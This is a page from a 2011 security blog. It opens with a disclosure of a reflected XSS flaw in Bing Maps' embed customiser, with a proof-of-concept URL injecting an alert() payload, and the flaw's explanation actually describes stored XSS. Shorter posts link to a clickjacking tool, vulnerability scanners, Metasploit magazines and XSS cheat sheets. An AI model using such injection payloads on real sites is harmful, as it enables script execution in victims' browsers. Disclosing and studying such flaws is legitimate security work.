... neuere Einträge
Tuesday, 23. August 2011
BING.COM - XSS
Am Tuesday, 23. Aug 2011 im Topic 'Vulnerabilities'
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected
Description
------------------
BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.
Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read
Exploit example as follow
-----------------------------
http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW
The vulnerability is caused by the following code and affected by the
Generate Code map
by
runlvl
Vulnerability Type : XSS Reflected
Description
------------------
BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.
Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read
Exploit example as follow
-----------------------------
http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW
The vulnerability is caused by the following code and affected by the
Generate Code map
by
runlvl
Clickjacking Tool
Am Tuesday, 23. Aug 2011 im Topic 'Tools'
Among the features of the new tool are:
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the science
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
Download
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the science
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
Download
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip
Google - help me
Am Tuesday, 23. Aug 2011 im Topic 'Tutorials'
NESSUS - help me
Am Tuesday, 23. Aug 2011 im Topic 'Tutorials'
How NESSUS works
http://www.cs.cmu.edu/~dwendlan/personal/nessus.html
How to use NESSUS
http://www.symantec.com/connect/articles/introduction-nessus
Download
http://www.nessus.org/products/nessus/nessus-download-agreement
http://www.cs.cmu.edu/~dwendlan/personal/nessus.html
How to use NESSUS
http://www.symantec.com/connect/articles/introduction-nessus
Download
http://www.nessus.org/products/nessus/nessus-download-agreement
ClubHack Mag Issue Issue 19, August 2011
Am Tuesday, 23. Aug 2011 im Topic 'Books change the World'
This issue covers Gonna’ Break It on Gonna’ Kick it Root Down in Tech Gyan, RSA Security in Moms Guide, SniffJoke – Defeating Interception Framework in Tool Gyan, Patent Law and Computer Technology in Legal Gyan and Social Engineering Toolkit in Matriux Vibhag
Download PDF
http://chmag.in/issue/aug2011.pdf
Download PDF
http://chmag.in/issue/aug2011.pdf
ClubHack Mag Issue 18-July2011
Am Tuesday, 23. Aug 2011 im Topic 'Books change the World'
This issue covers following articles:-
0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF
Download PDF
http://chmag.in/issue/jul2011.pdf
0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF
Download PDF
http://chmag.in/issue/jul2011.pdf
XSS - Cross Site Scripting Cheat Sheet and more...
Am Tuesday, 23. Aug 2011 im Topic 'Tutorials'
If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you.
http://ha.ckers.org/xss.html
Here you find my custom XSS and CSRF cheat sheet
http://www.xenuser.org/xss-cheat-sheet/
http://ha.ckers.org/xss.html
Here you find my custom XSS and CSRF cheat sheet
http://www.xenuser.org/xss-cheat-sheet/
Facebook Security Guide
Am Tuesday, 23. Aug 2011 im Topic 'News'
Protecting your Facebook account
Avoiding the scammers (very helpful examples of the most popular Facebook scams)
Using advanced security settings (one-time passwords, secure browsing, singel sign-on, social authentication, etc.)
Recovering a hacked Facebook account
Stopping imposters
Download PDF
https://www.facebook.com/safety/attachment/Guide%20to%20Facebook%20Security.pdf
Avoiding the scammers (very helpful examples of the most popular Facebook scams)
Using advanced security settings (one-time passwords, secure browsing, singel sign-on, social authentication, etc.)
Recovering a hacked Facebook account
Stopping imposters
Download PDF
https://www.facebook.com/safety/attachment/Guide%20to%20Facebook%20Security.pdf
Uniscan 4.0 vulnerability scanner
Am Tuesday, 23. Aug 2011 im Topic 'Pentest'
Uniscan Features
Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.
Download
http://sourceforge.net/projects/uniscan/files/4.0/uniscan.tar/download
Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.
Download
http://sourceforge.net/projects/uniscan/files/4.0/uniscan.tar/download
JonDoFox 2.5.3 - anonymous and secure
Am Tuesday, 23. Aug 2011 im Topic 'Web Security'
JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommended our proxy tool JonDo but you may use other anonymsation services like Tor Onion Router.
Download
https://anonymous-proxy-servers.net/en/jondofox.html
Download
https://anonymous-proxy-servers.net/en/jondofox.html
update: OWASP Zed Attack Proxy v.1.3.2 Released
Am Tuesday, 23. Aug 2011 im Topic 'Pentest'
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.
Download
http://code.google.com/p/zaproxy/downloads/list
Download
http://code.google.com/p/zaproxy/downloads/list
tor2web: visit anonymous websites
Am Tuesday, 23. Aug 2011 im Topic 'Web Security'
Tor is a software project that lets you use the Internet anonymously. tor2web is a project to let Internet users access anonymous servers.
Source
http://tor2web.org/
Source
http://tor2web.org/
... ältere Einträge